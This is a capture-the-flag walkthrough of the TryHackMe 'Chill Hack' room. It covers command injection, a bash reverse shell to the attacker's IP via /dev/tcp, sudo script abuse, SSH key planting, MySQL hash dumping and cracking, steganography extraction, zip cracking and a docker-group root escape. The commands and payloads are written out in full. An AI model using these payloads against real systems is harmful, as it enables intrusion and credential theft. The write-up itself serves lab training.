Chill Hack — Tryhackme.com

Room link: https://tryhackme.com/room/chillhack

A quick enum to get started, I usually run as a basic, nmap, nikto, gobuster as a min.

Nmap

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Gobuster

/css
/images
/fonts 
/secret                         #  Seem's intresting!
/js                  

http://10.10.44.162/secret/

*replace your IP for the rooms IP

This page gives us a box with command execution (Easy!)

Trying other things like “ls” gives you…

Testing some more I quickly realise we can chain together commands using “;” ie:

id;ls

I captured the request in burp suite and then tried a few payloads to get a reverse shell back. First I checked with a simple ping command for a result to prove the connection back.

Kali

sudo tcpdump -i tun0 icmp

Post request

POST /secret/ HTTP/1.1
Host: 10.10.44.162
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://10.10.44.162
Connection: close
Referer: http://10.10.44.162/secret/
Upgrade-Insecure-Requests: 1
command=id%3bping%20-c%201%2010.8.153.120

Bingo! A reply!

┌──(ac1d㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp                          
[sudo] password for ac1d: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:35:26.127709 IP 10.10.44.162 > 10.8.153.120: ICMP echo request, id 1871, seq 1, length 64
23:35:26.127742 IP 10.8.153.120 > 10.10.44.162: ICMP echo reply, id 1871, seq 1, length 64

Now I test payloads to see what pings back.

Reverse shell

Sending a bash rev shell we can get a reverse shell from the command injection we just found.

command=id%3bbash%20-c%20%22%2fbin%2fbash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.8.153.120%2f9999%200%3e%261%

Decoded

command=id;bash -c "/bin/bash -i >& /dev/tcp/10.8.153.120/9999 0>&1"

User

Checking sudo -l as www-data shows us something interesting.

Matching Defaults entries for www-data on ubuntu:                                                                                                                                     env_reset, mail_badpass,                                                                                                                                                         secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                                                                 
User www-data may run the following commands on ubuntu:                                                                                                                               (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh                                                                                                                             

www-data@ubuntu:/tmp$  cat /home/apaar/.helpline.sh
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person,  Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"

We can run a script as the user apaar.
The script seems to read a name and add it to the person variable.
Then ask for a msg but never use it. 2>/dev/null 2=STDERR, so send all errors to nothing (but still executing).

I send another ping to myself to prove it's working.

Then I try simply /bin/bash for a shell as the user.

sudo -u apaar /home/apaar/.helpline.sh

Now we upgrade our terminal. But also we want a better terminal, so read on.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Get ssh access

Now seeing the .ssh/ folder is now writable I can add my ssh public key and just log in.

Kali box

ssh-keygen

Accept all defaults and then cat the id_rsa.pub key out.

cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQq4KtSkrifBP5HFkQ+/zrsalHvnsNI1TvefMU92X06G6XN9E2fYajOuLq/0yV1Ak57ohnNQFXSFHQBV9tB0rTFDmhaHCaGuqX+ZSMvSwHwZW32OasxAMnJPbTzSCqli58JN+GdVd81PJPNHnva1Q2WZ/cnvfc<REDACTED>0yFWnTkjx4tAZV+DG27IiOTlJSe2rUFR/eRDI7kN3d2qDiqChI/7F+ld+lqZLEHOhagYSamwGGu0t+0H39COfLX5PfhMBMKKpaaR6FR8AdYvIw6yyoNjNfnnXU2977Cn7m/Zz/l7xy+KYXRng+JBtjDbyg4jXGc= ac1d@kali

Then on the attacking machine add it to the authorized_keys file.

cat <<EOF > authorized_keys
#paste the key here
EOF

Now connect to the ssh

ssh apaar@10.10.44.162 -i ~/.ssh/id_rsa

A much better terminal

We can now get the user flag in /home/apaar/local.txt

Enum Round 2

Checking the rest of the system I saw the username and password for mysql in the index page for login.

Using the details we can log in and check the databases out.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| webportal          |
+--------------------+
5 rows in set (0.00 sec)
mysql> use webportal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+---------------------+
| Tables_in_webportal |
+---------------------+
| users               |
+---------------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+

Let's see if we can crack the passwords.

anurodh:masterpassword
apaar:dontaskdonttell

Running linpeas again as apaar didn’t show much new at all. I spent hours looking and finding not much at all. I saw a port running on 127.0.0.1:9001 I hadn’t checked out yet, so started there.

This seemed the host an apache server on port 9001, which is owned by root user.

I started to check the images with stego techniques.

steghide info hacker-with-laptop_23-2147985341.jpg 
"hacker-with-laptop_23-2147985341.jpg":
  format: jpeg
  capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "backup.zip":
    size: 750.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
    
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase: 
wrote extracted data to "backup.zip".

Time to crack the .zip file. We can do this in a few ways.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt hacker-with-laptop_23-2147985341.jpg backup.zip 
found id e0ffd8ff, 'hacker-with-laptop_23-2147985341.jpg' is not a zipfile ver 2.xx, skipping
PASSWORD FOUND!!!!: pw == pass1word
unzip backip.zip
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php

We can get a base64 password from the file extracted.

Using that password for anurodh we can swap user accounts.
Running linpeas again as anurodh shows we can use docker and it's writable! (escape time)

Root

Listing the images shows us some containers ready to roll.

I know i’ve used the alpine exploit to escape docker before.
We can run the docker cm mount it with bash and save no session. Then grab the last flag!

docker run -v /:/mnt --rm -it alpine chroot /mnt bash

Credits: https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

Thanks for reading :)